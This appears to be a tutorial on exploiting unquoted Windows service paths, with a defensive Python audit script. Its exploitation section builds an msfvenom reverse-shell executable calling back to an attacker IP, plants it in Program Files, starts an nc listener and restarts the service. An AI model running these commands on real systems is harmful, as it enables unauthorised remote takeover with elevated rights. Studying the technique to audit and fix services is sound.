Unquoted Service Paths
Overview
Unquoted service path exploitation is similar to binary path exploitation; however, the vulnerability lies in the fact that the path to the executable is unquoted.
When the service is started, Windows walks through the path word by word, splitting at each space, and tests each result with .exe appended:
C:\Program.exe - NO
C:\Program Files.exe - NO
C:\Program Files\Unquoted.exe - NO
C:\Program Files\Unquoted Path.exe - NO
And so on...
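From the defender's side, the same search order can be computed for every service ImagePath to find the entries that need quoting. The following Python audit is an added example, not part of the original notes; it assumes the truncate-at-each-space behaviour documented for CreateProcess and a simple `.exe` heuristic to separate the executable from its arguments, and it runs on constructed sample data (the `Common Files\svc.exe` tail and the three other services are made up).

```python
import re

# Constructed (service name, ImagePath) pairs for illustration; not from a real host.
SAMPLE_SERVICES = [
    ("unquotedsvc", r"C:\Program Files\Unquoted Path Service\Common Files\svc.exe"),
    ("quotedsvc", r'"C:\Program Files\Vendor App\agent.exe" --run'),
    ("svchostgrp", r"C:\Windows\system32\svchost.exe -k netsvcs"),
    ("nospace", r"C:\Tools\agent.exe"),
]

# Heuristic (assumption): the executable ends at the first ".exe" that is
# followed by whitespace or the end of the string; the rest is arguments.
EXE_END = re.compile(r"\.exe(?=\s|$)", re.IGNORECASE)


def executable_part(image_path):
    """Return the executable portion of an unquoted ImagePath, or None if it is quoted."""
    path = image_path.strip()
    if path.startswith('"'):
        return None
    match = EXE_END.search(path)
    return path[:match.end()] if match else path


def candidates(image_path):
    """List the files Windows would test before reaching the intended binary."""
    exe = executable_part(image_path)
    if exe is None or " " not in exe:
        return []  # quoted, or spaces appear only in the arguments
    return [exe[:i] + ".exe" for i, ch in enumerate(exe) if ch == " "]


def audit(services):
    """Map each affected service to its quoted form and the locations to review."""
    findings = {}
    for name, image_path in services:
        found = candidates(image_path)
        if found:
            findings[name] = {
                "quote_as": '"%s"' % executable_part(image_path),
                "review_write_access": found,
            }
    return findings


if __name__ == "__main__":
    for name, info in audit(SAMPLE_SERVICES).items():
        print(name, "->", info["quote_as"])
        for location in info["review_write_access"]:
            print("   candidate:", location)
```

Each reported service should have its ImagePath rewritten to the quoted form, and the parent directory of every listed candidate should not be writable by non-administrators.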
Manual Exploitation
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """
sc.exe qc iobitunsvr
Exploitation via PowerUp
Run PowerUp and look for the Unquoted Service Paths section in its output

Create and drop a malicious executable
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.8 LPORT=1337 -f exe -o Common.exe
copy C:\temp\Common.exe "C:\Program Files\Unquoted Path Service\Common.exe"
Start a listener and the service
nc -lnvp 1337
sc.exe start unquotedsvc